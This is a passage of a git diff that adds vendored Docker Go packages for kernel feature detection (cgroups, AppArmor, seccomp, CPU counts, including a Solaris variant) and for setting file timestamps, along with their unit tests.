isDriveOrRoot(p string) bool { + if p == string(filepath.Separator) { + return true + } + + length := len(p) + if length >= 2 { + if p[length-1] == ':' && (('a' <= p[length-2] && p[length-2] <= 'z') || ('A' <= p[length-2] && p[length-2] <= 'Z')) { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/README.md b/vendor/github.com/docker/docker/pkg/sysinfo/README.md new file mode 100644 index 0000000000..c1530cef0d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/README.md @@ -0,0 +1 @@ +SysInfo stores information about which features a kernel supports. 
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go new file mode 100644 index 0000000000..aeb1a3a804 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go @@ -0,0 +1,12 @@ +// +build !linux,!windows + +package sysinfo + +import ( + "runtime" +) + +// NumCPU returns the number of CPUs +func NumCPU() int { + return runtime.NumCPU() +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go new file mode 100644 index 0000000000..5eacd35121 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go @@ -0,0 +1,43 @@ +// +build linux + +package sysinfo + +import ( + "runtime" + "syscall" + "unsafe" +) + +// numCPU queries the system for the count of threads available +// for use to this process. +// +// Issues two syscalls. +// Returns 0 on errors. Use |runtime.NumCPU| in that case. +func numCPU() int { + // Gets the affinity mask for a process: The very one invoking this function. + pid, _, _ := syscall.RawSyscall(syscall.SYS_GETPID, 0, 0, 0) + + var mask [1024 / 64]uintptr + _, _, err := syscall.RawSyscall(syscall.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0]))) + if err != 0 { + return 0 + } + + // For every available thread a bit is set in the mask. 
+ ncpu := 0 + for _, e := range mask { + if e == 0 { + continue + } + ncpu += int(popcnt(uint64(e))) + } + return ncpu +} + +// NumCPU returns the number of CPUs which are currently online +func NumCPU() int { + if ncpu := numCPU(); ncpu > 0 { + return ncpu + } + return runtime.NumCPU() +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go new file mode 100644 index 0000000000..1d89dd5503 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go @@ -0,0 +1,37 @@ +// +build windows + +package sysinfo + +import ( + "runtime" + "unsafe" + + "golang.org/x/sys/windows" +) + +var ( + kernel32 = windows.NewLazySystemDLL("kernel32.dll") + getCurrentProcess = kernel32.NewProc("GetCurrentProcess") + getProcessAffinityMask = kernel32.NewProc("GetProcessAffinityMask") +) + +func numCPU() int { + // Gets the affinity mask for a process + var mask, sysmask uintptr + currentProcess, _, _ := getCurrentProcess.Call() + ret, _, _ := getProcessAffinityMask.Call(currentProcess, uintptr(unsafe.Pointer(&mask)), uintptr(unsafe.Pointer(&sysmask))) + if ret == 0 { + return 0 + } + // For every available thread a bit is set in the mask. + ncpu := int(popcnt(uint64(mask))) + return ncpu +} + +// NumCPU returns the number of CPUs which are currently online +func NumCPU() int { + if ncpu := numCPU(); ncpu > 0 { + return ncpu + } + return runtime.NumCPU() +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go new file mode 100644 index 0000000000..f046de4b16 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go @@ -0,0 +1,144 @@ +package sysinfo + +import "github.com/docker/docker/pkg/parsers" + +// SysInfo stores information about which features a kernel supports. +// TODO Windows: Factor out platform specific capabilities. 
+type SysInfo struct { + // Whether the kernel supports AppArmor or not + AppArmor bool + // Whether the kernel supports Seccomp or not + Seccomp bool + + cgroupMemInfo + cgroupCPUInfo + cgroupBlkioInfo + cgroupCpusetInfo + cgroupPids + + // Whether IPv4 forwarding is supported or not, if this was disabled, networking will not work + IPv4ForwardingDisabled bool + + // Whether bridge-nf-call-iptables is supported or not + BridgeNFCallIPTablesDisabled bool + + // Whether bridge-nf-call-ip6tables is supported or not + BridgeNFCallIP6TablesDisabled bool + + // Whether the cgroup has the mountpoint of "devices" or not + CgroupDevicesEnabled bool +} + +type cgroupMemInfo struct { + // Whether memory limit is supported or not + MemoryLimit bool + + // Whether swap limit is supported or not + SwapLimit bool + + // Whether soft limit is supported or not + MemoryReservation bool + + // Whether OOM killer disable is supported or not + OomKillDisable bool + + // Whether memory swappiness is supported or not + MemorySwappiness bool + + // Whether kernel memory limit is supported or not + KernelMemory bool +} + +type cgroupCPUInfo struct { + // Whether CPU shares is supported or not + CPUShares bool + + // Whether CPU CFS(Completely Fair Scheduler) period is supported or not + CPUCfsPeriod bool + + // Whether CPU CFS(Completely Fair Scheduler) quota is supported or not + CPUCfsQuota bool + + // Whether CPU real-time period is supported or not + CPURealtimePeriod bool + + // Whether CPU real-time runtime is supported or not + CPURealtimeRuntime bool +} + +type cgroupBlkioInfo struct { + // Whether Block IO weight is supported or not + BlkioWeight bool + + // Whether Block IO weight_device is supported or not + BlkioWeightDevice bool + + // Whether Block IO read limit in bytes per second is supported or not + BlkioReadBpsDevice bool + + // Whether Block IO write limit in bytes per second is supported or not + BlkioWriteBpsDevice bool + + // Whether Block IO read limit in IO per 
second is supported or not + BlkioReadIOpsDevice bool + + // Whether Block IO write limit in IO per second is supported or not + BlkioWriteIOpsDevice bool +} + +type cgroupCpusetInfo struct { + // Whether Cpuset is supported or not + Cpuset bool + + // Available Cpuset's cpus + Cpus string + + // Available Cpuset's memory nodes + Mems string +} + +type cgroupPids struct { + // Whether Pids Limit is supported or not + PidsLimit bool +} + +// IsCpusetCpusAvailable returns `true` if the provided string set is contained +// in cgroup's cpuset.cpus set, `false` otherwise. +// If error is not nil a parsing error occurred. +func (c cgroupCpusetInfo) IsCpusetCpusAvailable(provided string) (bool, error) { + return isCpusetListAvailable(provided, c.Cpus) +} + +// IsCpusetMemsAvailable returns `true` if the provided string set is contained +// in cgroup's cpuset.mems set, `false` otherwise. +// If error is not nil a parsing error occurred. +func (c cgroupCpusetInfo) IsCpusetMemsAvailable(provided string) (bool, error) { + return isCpusetListAvailable(provided, c.Mems) +} + +func isCpusetListAvailable(provided, available string) (bool, error) { + parsedProvided, err := parsers.ParseUintList(provided) + if err != nil { + return false, err + } + parsedAvailable, err := parsers.ParseUintList(available) + if err != nil { + return false, err + } + for k := range parsedProvided { + if !parsedAvailable[k] { + return false, nil + } + } + return true, nil +} + +// Returns bit count of 1, used by NumCPU +func popcnt(x uint64) (n byte) { + x -= (x >> 1) & 0x5555555555555555 + x = (x>>2)&0x3333333333333333 + x&0x3333333333333333 + x += x >> 4 + x &= 0x0f0f0f0f0f0f0f0f + x *= 0x0101010101010101 + return byte(x >> 56) +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go new file mode 100644 index 0000000000..7ad84a8309 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go @@ 
-0,0 +1,259 @@ +package sysinfo + +import ( + "fmt" + "io/ioutil" + "os" + "path" + "strings" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/opencontainers/runc/libcontainer/cgroups" +) + +const ( + // SeccompModeFilter refers to the syscall argument SECCOMP_MODE_FILTER. + SeccompModeFilter = uintptr(2) +) + +func findCgroupMountpoints() (map[string]string, error) { + cgMounts, err := cgroups.GetCgroupMounts(false) + if err != nil { + return nil, fmt.Errorf("Failed to parse cgroup information: %v", err) + } + mps := make(map[string]string) + for _, m := range cgMounts { + for _, ss := range m.Subsystems { + mps[ss] = m.Mountpoint + } + } + return mps, nil +} + +// New returns a new SysInfo, using the filesystem to detect which features +// the kernel supports. If `quiet` is `false` warnings are printed in logs +// whenever an error occurs or misconfigurations are present. +func New(quiet bool) *SysInfo { + sysInfo := &SysInfo{} + cgMounts, err := findCgroupMountpoints() + if err != nil { + logrus.Warnf("Failed to parse cgroup information: %v", err) + } else { + sysInfo.cgroupMemInfo = checkCgroupMem(cgMounts, quiet) + sysInfo.cgroupCPUInfo = checkCgroupCPU(cgMounts, quiet) + sysInfo.cgroupBlkioInfo = checkCgroupBlkioInfo(cgMounts, quiet) + sysInfo.cgroupCpusetInfo = checkCgroupCpusetInfo(cgMounts, quiet) + sysInfo.cgroupPids = checkCgroupPids(quiet) + } + + _, ok := cgMounts["devices"] + sysInfo.CgroupDevicesEnabled = ok + + sysInfo.IPv4ForwardingDisabled = !readProcBool("/proc/sys/net/ipv4/ip_forward") + sysInfo.BridgeNFCallIPTablesDisabled = !readProcBool("/proc/sys/net/bridge/bridge-nf-call-iptables") + sysInfo.BridgeNFCallIP6TablesDisabled = !readProcBool("/proc/sys/net/bridge/bridge-nf-call-ip6tables") + + // Check if AppArmor is supported. + if _, err := os.Stat("/sys/kernel/security/apparmor"); !os.IsNotExist(err) { + sysInfo.AppArmor = true + } + + // Check if Seccomp is supported, via CONFIG_SECCOMP. 
+ if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_GET_SECCOMP, 0, 0); err != syscall.EINVAL { + // Make sure the kernel has CONFIG_SECCOMP_FILTER. + if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_SET_SECCOMP, SeccompModeFilter, 0); err != syscall.EINVAL { + sysInfo.Seccomp = true + } + } + + return sysInfo +} + +// checkCgroupMem reads the memory information from the memory cgroup mount point. +func checkCgroupMem(cgMounts map[string]string, quiet bool) cgroupMemInfo { + mountPoint, ok := cgMounts["memory"] + if !ok { + if !quiet { + logrus.Warn("Your kernel does not support cgroup memory limit") + } + return cgroupMemInfo{} + } + + swapLimit := cgroupEnabled(mountPoint, "memory.memsw.limit_in_bytes") + if !quiet && !swapLimit { + logrus.Warn("Your kernel does not support swap memory limit") + } + memoryReservation := cgroupEnabled(mountPoint, "memory.soft_limit_in_bytes") + if !quiet && !memoryReservation { + logrus.Warn("Your kernel does not support memory reservation") + } + oomKillDisable := cgroupEnabled(mountPoint, "memory.oom_control") + if !quiet && !oomKillDisable { + logrus.Warn("Your kernel does not support oom control") + } + memorySwappiness := cgroupEnabled(mountPoint, "memory.swappiness") + if !quiet && !memorySwappiness { + logrus.Warn("Your kernel does not support memory swappiness") + } + kernelMemory := cgroupEnabled(mountPoint, "memory.kmem.limit_in_bytes") + if !quiet && !kernelMemory { + logrus.Warn("Your kernel does not support kernel memory limit") + } + + return cgroupMemInfo{ + MemoryLimit: true, + SwapLimit: swapLimit, + MemoryReservation: memoryReservation, + OomKillDisable: oomKillDisable, + MemorySwappiness: memorySwappiness, + KernelMemory: kernelMemory, + } +} + +// checkCgroupCPU reads the cpu information from the cpu cgroup mount point. 
+func checkCgroupCPU(cgMounts map[string]string, quiet bool) cgroupCPUInfo { + mountPoint, ok := cgMounts["cpu"] + if !ok { + if !quiet { + logrus.Warn("Unable to find cpu cgroup in mounts") + } + return cgroupCPUInfo{} + } + + cpuShares := cgroupEnabled(mountPoint, "cpu.shares") + if !quiet && !cpuShares { + logrus.Warn("Your kernel does not support cgroup cpu shares") + } + + cpuCfsPeriod := cgroupEnabled(mountPoint, "cpu.cfs_period_us") + if !quiet && !cpuCfsPeriod { + logrus.Warn("Your kernel does not support cgroup cfs period") + } + + cpuCfsQuota := cgroupEnabled(mountPoint, "cpu.cfs_quota_us") + if !quiet && !cpuCfsQuota { + logrus.Warn("Your kernel does not support cgroup cfs quotas") + } + + cpuRealtimePeriod := cgroupEnabled(mountPoint, "cpu.rt_period_us") + if !quiet && !cpuRealtimePeriod { + logrus.Warn("Your kernel does not support cgroup rt period") + } + + cpuRealtimeRuntime := cgroupEnabled(mountPoint, "cpu.rt_runtime_us") + if !quiet && !cpuRealtimeRuntime { + logrus.Warn("Your kernel does not support cgroup rt runtime") + } + + return cgroupCPUInfo{ + CPUShares: cpuShares, + CPUCfsPeriod: cpuCfsPeriod, + CPUCfsQuota: cpuCfsQuota, + CPURealtimePeriod: cpuRealtimePeriod, + CPURealtimeRuntime: cpuRealtimeRuntime, + } +} + +// checkCgroupBlkioInfo reads the blkio information from the blkio cgroup mount point. 
+func checkCgroupBlkioInfo(cgMounts map[string]string, quiet bool) cgroupBlkioInfo { + mountPoint, ok := cgMounts["blkio"] + if !ok { + if !quiet { + logrus.Warn("Unable to find blkio cgroup in mounts") + } + return cgroupBlkioInfo{} + } + + weight := cgroupEnabled(mountPoint, "blkio.weight") + if !quiet && !weight { + logrus.Warn("Your kernel does not support cgroup blkio weight") + } + + weightDevice := cgroupEnabled(mountPoint, "blkio.weight_device") + if !quiet && !weightDevice { + logrus.Warn("Your kernel does not support cgroup blkio weight_device") + } + + readBpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.read_bps_device") + if !quiet && !readBpsDevice { + logrus.Warn("Your kernel does not support cgroup blkio throttle.read_bps_device") + } + + writeBpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.write_bps_device") + if !quiet && !writeBpsDevice { + logrus.Warn("Your kernel does not support cgroup blkio throttle.write_bps_device") + } + readIOpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.read_iops_device") + if !quiet && !readIOpsDevice { + logrus.Warn("Your kernel does not support cgroup blkio throttle.read_iops_device") + } + + writeIOpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.write_iops_device") + if !quiet && !writeIOpsDevice { + logrus.Warn("Your kernel does not support cgroup blkio throttle.write_iops_device") + } + return cgroupBlkioInfo{ + BlkioWeight: weight, + BlkioWeightDevice: weightDevice, + BlkioReadBpsDevice: readBpsDevice, + BlkioWriteBpsDevice: writeBpsDevice, + BlkioReadIOpsDevice: readIOpsDevice, + BlkioWriteIOpsDevice: writeIOpsDevice, + } +} + +// checkCgroupCpusetInfo reads the cpuset information from the cpuset cgroup mount point. 
+func checkCgroupCpusetInfo(cgMounts map[string]string, quiet bool) cgroupCpusetInfo { + mountPoint, ok := cgMounts["cpuset"] + if !ok { + if !quiet { + logrus.Warn("Unable to find cpuset cgroup in mounts") + } + return cgroupCpusetInfo{} + } + + cpus, err := ioutil.ReadFile(path.Join(mountPoint, "cpuset.cpus")) + if err != nil { + return cgroupCpusetInfo{} + } + + mems, err := ioutil.ReadFile(path.Join(mountPoint, "cpuset.mems")) + if err != nil { + return cgroupCpusetInfo{} + } + + return cgroupCpusetInfo{ + Cpuset: true, + Cpus: strings.TrimSpace(string(cpus)), + Mems: strings.TrimSpace(string(mems)), + } +} + +// checkCgroupPids reads the pids information from the pids cgroup mount point. +func checkCgroupPids(quiet bool) cgroupPids { + _, err := cgroups.FindCgroupMountpoint("pids") + if err != nil { + if !quiet { + logrus.Warn(err) + } + return cgroupPids{} + } + + return cgroupPids{ + PidsLimit: true, + } +} + +func cgroupEnabled(mountPoint, name string) bool { + _, err := os.Stat(path.Join(mountPoint, name)) + return err == nil +} + +func readProcBool(path string) bool { + val, err := ioutil.ReadFile(path) + if err != nil { + return false + } + return strings.TrimSpace(string(val)) == "1" +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go new file mode 100644 index 0000000000..fae0fdffbb --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go @@ -0,0 +1,58 @@ +package sysinfo + +import ( + "io/ioutil" + "os" + "path" + "path/filepath" + "testing" +) + +func TestReadProcBool(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "test-sysinfo-proc") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + procFile := filepath.Join(tmpDir, "read-proc-bool") + if err := ioutil.WriteFile(procFile, []byte("1"), 644); err != nil { + t.Fatal(err) + } + + if !readProcBool(procFile) { + t.Fatal("expected proc bool to be true, got 
false") + } + + if err := ioutil.WriteFile(procFile, []byte("0"), 644); err != nil { + t.Fatal(err) + } + if readProcBool(procFile) { + t.Fatal("expected proc bool to be false, got false") + } + + if readProcBool(path.Join(tmpDir, "no-exist")) { + t.Fatal("should be false for non-existent entry") + } + +} + +func TestCgroupEnabled(t *testing.T) { + cgroupDir, err := ioutil.TempDir("", "cgroup-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(cgroupDir) + + if cgroupEnabled(cgroupDir, "test") { + t.Fatal("cgroupEnabled should be false") + } + + if err := ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 644); err != nil { + t.Fatal(err) + } + + if !cgroupEnabled(cgroupDir, "test") { + t.Fatal("cgroupEnabled should be true") + } +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go new file mode 100644 index 0000000000..c858d57e08 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go @@ -0,0 +1,121 @@ +// +build solaris,cgo + +package sysinfo + +import ( + "bytes" + "os/exec" + "strconv" + "strings" +) + +/* +#cgo LDFLAGS: -llgrp +#include +#include +#include +int getLgrpCount() { + lgrp_cookie_t lgrpcookie = LGRP_COOKIE_NONE; + uint_t nlgrps; + + if ((lgrpcookie = lgrp_init(LGRP_VIEW_OS)) == LGRP_COOKIE_NONE) { + return -1; + } + nlgrps = lgrp_nlgrps(lgrpcookie); + return nlgrps; +} +*/ +import "C" + +// IsCPUSharesAvailable returns whether CPUShares setting is supported. 
+// We need FSS to be set as default scheduling class to support CPU Shares +func IsCPUSharesAvailable() bool { + cmd := exec.Command("/usr/sbin/dispadmin", "-d") + outBuf := new(bytes.Buffer) + errBuf := new(bytes.Buffer) + cmd.Stderr = errBuf + cmd.Stdout = outBuf + + if err := cmd.Run(); err != nil { + return false + } + return (strings.Contains(outBuf.String(), "FSS")) +} + +// New returns a new SysInfo, using the filesystem to detect which features +// the kernel supports. +//NOTE Solaris: If we change the below capabilities be sure +// to update verifyPlatformContainerSettings() in daemon_solaris.go +func New(quiet bool) *SysInfo { + sysInfo := &SysInfo{} + sysInfo.cgroupMemInfo = setCgroupMem(quiet) + sysInfo.cgroupCPUInfo = setCgroupCPU(quiet) + sysInfo.cgroupBlkioInfo = setCgroupBlkioInfo(quiet) + sysInfo.cgroupCpusetInfo = setCgroupCPUsetInfo(quiet) + + sysInfo.IPv4ForwardingDisabled = false + + sysInfo.AppArmor = false + + return sysInfo +} + +// setCgroupMem reads the memory information for Solaris. +func setCgroupMem(quiet bool) cgroupMemInfo { + + return cgroupMemInfo{ + MemoryLimit: true, + SwapLimit: true, + MemoryReservation: false, + OomKillDisable: false, + MemorySwappiness: false, + KernelMemory: false, + } +} + +// setCgroupCPU reads the cpu information for Solaris. +func setCgroupCPU(quiet bool) cgroupCPUInfo { + + return cgroupCPUInfo{ + CPUShares: true, + CPUCfsPeriod: false, + CPUCfsQuota: true, + CPURealtimePeriod: false, + CPURealtimeRuntime: false, + } +} + +// blkio switches are not supported in Solaris. +func setCgroupBlkioInfo(quiet bool) cgroupBlkioInfo { + + return cgroupBlkioInfo{ + BlkioWeight: false, + BlkioWeightDevice: false, + } +} + +// setCgroupCPUsetInfo reads the cpuset information for Solaris. 
+func setCgroupCPUsetInfo(quiet bool) cgroupCpusetInfo { + + return cgroupCpusetInfo{ + Cpuset: true, + Cpus: getCPUCount(), + Mems: getLgrpCount(), + } +} + +func getCPUCount() string { + ncpus := C.sysconf(C._SC_NPROCESSORS_ONLN) + if ncpus <= 0 { + return "" + } + return strconv.FormatInt(int64(ncpus), 16) +} + +func getLgrpCount() string { + nlgrps := C.getLgrpCount() + if nlgrps <= 0 { + return "" + } + return strconv.FormatInt(int64(nlgrps), 16) +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go new file mode 100644 index 0000000000..b61fbcf541 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go @@ -0,0 +1,26 @@ +package sysinfo + +import "testing" + +func TestIsCpusetListAvailable(t *testing.T) { + cases := []struct { + provided string + available string + res bool + err bool + }{ + {"1", "0-4", true, false}, + {"01,3", "0-4", true, false}, + {"", "0-7", true, false}, + {"1--42", "0-7", false, true}, + {"1-42", "00-1,8,,9", false, true}, + {"1,41-42", "43,45", false, false}, + {"0-3", "", false, false}, + } + for _, c := range cases { + r, err := isCpusetListAvailable(c.provided, c.available) + if (c.err && err == nil) && r != c.res { + t.Fatalf("Expected pair: %v, %v for %s, %s. Got %v, %v instead", c.res, c.err, c.provided, c.available, (c.err && err == nil), r) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go new file mode 100644 index 0000000000..45f3ef1c65 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go @@ -0,0 +1,9 @@ +// +build !linux,!solaris,!windows + +package sysinfo + +// New returns an empty SysInfo for non linux nor solaris for now. 
+func New(quiet bool) *SysInfo { + sysInfo := &SysInfo{} + return sysInfo +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go new file mode 100644 index 0000000000..4e6255bc59 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go @@ -0,0 +1,9 @@ +// +build windows + +package sysinfo + +// New returns an empty SysInfo for windows for now. +func New(quiet bool) *SysInfo { + sysInfo := &SysInfo{} + return sysInfo +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes.go b/vendor/github.com/docker/docker/pkg/system/chtimes.go new file mode 100644 index 0000000000..7637f12e1a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes.go @@ -0,0 +1,52 @@ +package system + +import ( + "os" + "syscall" + "time" + "unsafe" +) + +var ( + maxTime time.Time +) + +func init() { + if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 { + // This is a 64 bit timespec + // os.Chtimes limits time to the following + maxTime = time.Unix(0, 1<<63-1) + } else { + // This is a 32 bit timespec + maxTime = time.Unix(1<<31-1, 0) + } +} + +// Chtimes changes the access time and modified time of a file at the given path +func Chtimes(name string, atime time.Time, mtime time.Time) error { + unixMinTime := time.Unix(0, 0) + unixMaxTime := maxTime + + // If the modified time is prior to the Unix Epoch, or after the + // end of Unix Time, os.Chtimes has undefined behavior + // default to Unix Epoch in this case, just in case + + if atime.Before(unixMinTime) || atime.After(unixMaxTime) { + atime = unixMinTime + } + + if mtime.Before(unixMinTime) || mtime.After(unixMaxTime) { + mtime = unixMinTime + } + + if err := os.Chtimes(name, atime, mtime); err != nil { + return err + } + + // Take platform specific action for setting create time. 
+ if err := setCTime(name, mtime); err != nil { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go new file mode 100644 index 0000000000..5c87df32a2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go @@ -0,0 +1,94 @@ +package system + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + "time" +) + +// prepareTempFile creates a temporary file in a temporary directory. +func prepareTempFile(t *testing.T) (string, string) { + dir, err := ioutil.TempDir("", "docker-system-test") + if err != nil { + t.Fatal(err) + } + + file := filepath.Join(dir, "exist") + if err := ioutil.WriteFile(file, []byte("hello"), 0644); err != nil { + t.Fatal(err) + } + return file, dir +} + +// TestChtimes tests Chtimes on a tempfile. Test only mTime, because aTime is OS dependent +func TestChtimes(t *testing.T) { + file, dir := prepareTempFile(t) + defer os.RemoveAll(dir) + + beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second) + unixEpochTime := time.Unix(0, 0) + afterUnixEpochTime := time.Unix(100, 0) + unixMaxTime := maxTime + + // Test both aTime and mTime set to Unix Epoch + Chtimes(file, unixEpochTime, unixEpochTime) + + f, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime() != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, f.ModTime()) + } + + // Test aTime before Unix Epoch and mTime set to Unix Epoch + Chtimes(file, beforeUnixEpochTime, unixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime() != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, f.ModTime()) + } + + // Test aTime set to Unix Epoch and mTime before Unix Epoch + Chtimes(file, unixEpochTime, beforeUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime() != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", 
unixEpochTime, f.ModTime()) + } + + // Test both aTime and mTime set to after Unix Epoch (valid time) + Chtimes(file, afterUnixEpochTime, afterUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime() != afterUnixEpochTime { + t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, f.ModTime()) + } + + // Test both aTime and mTime set to Unix max time + Chtimes(file, unixMaxTime, unixMaxTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime().Truncate(time.Second) != unixMaxTime.Truncate(time.Second) { + t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), f.ModTime().Truncate(time.Second)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go new file mode 100644 index 0000000000..09d58bcbfd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go @@ -0,0 +1,14 @@ +// +build !windows + +package system + +import ( + "time" +) + +//setCTime will set the create time on a file. On Unix, the create +//time is updated as a side effect of setting the modified time, so +//no action is required. 
+func setCTime(path string, ctime time.Time) error { + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go new file mode 100644 index 0000000000..6ec9a7173c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go @@ -0,0 +1,91 @@ +// +build !windows + +package system + +import ( + "os" + "syscall" + "testing" + "time" +) + +// TestChtimesLinux tests Chtimes access time on a tempfile on Linux +func TestChtimesLinux(t *testing.T) { + file, dir := prepareTempFile(t) + defer os.RemoveAll(dir) + + beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second) + unixEpochTime := time.Unix(0, 0) + afterUnixEpochTime := time.Unix(100, 0) + unixMaxTime := maxTime + + // Test both aTime and mTime set to Unix Epoch + Chtimes(file, unixEpochTime, unixEpochTime) + + f, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat := f.Sys().(*syscall.Stat_t) + aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test aTime before Unix Epoch and mTime set to Unix Epoch + Chtimes(file, beforeUnixEpochTime, unixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat = f.Sys().(*syscall.Stat_t) + aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test aTime set to Unix Epoch and mTime before Unix Epoch + Chtimes(file, unixEpochTime, beforeUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat = f.Sys().(*syscall.Stat_t) + aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test both aTime and mTime set to after Unix Epoch (valid time) + Chtimes(file, 
afterUnixEpochTime, afterUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat = f.Sys().(*syscall.Stat_t) + aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime != afterUnixEpochTime { + t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, aTime) + } + + // Test both aTime and mTime set to Unix max time + Chtimes(file, unixMaxTime, unixMaxTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat = f.Sys().(*syscall.Stat_t) + aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime.Truncate(time.Second) != unixMaxTime.Truncate(time.Second) { + t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), aTime.Truncate(time.Second)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go new file mode 100644 index 0000000000..2945868465 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go @@ -0,0 +1,27 @@ +// +build windows + +package system + +import ( + "syscall" + "time" +) + +//setCTime will set the create time on a file. On Windows, this requires +//calling SetFileTime and explicitly including the create time. 
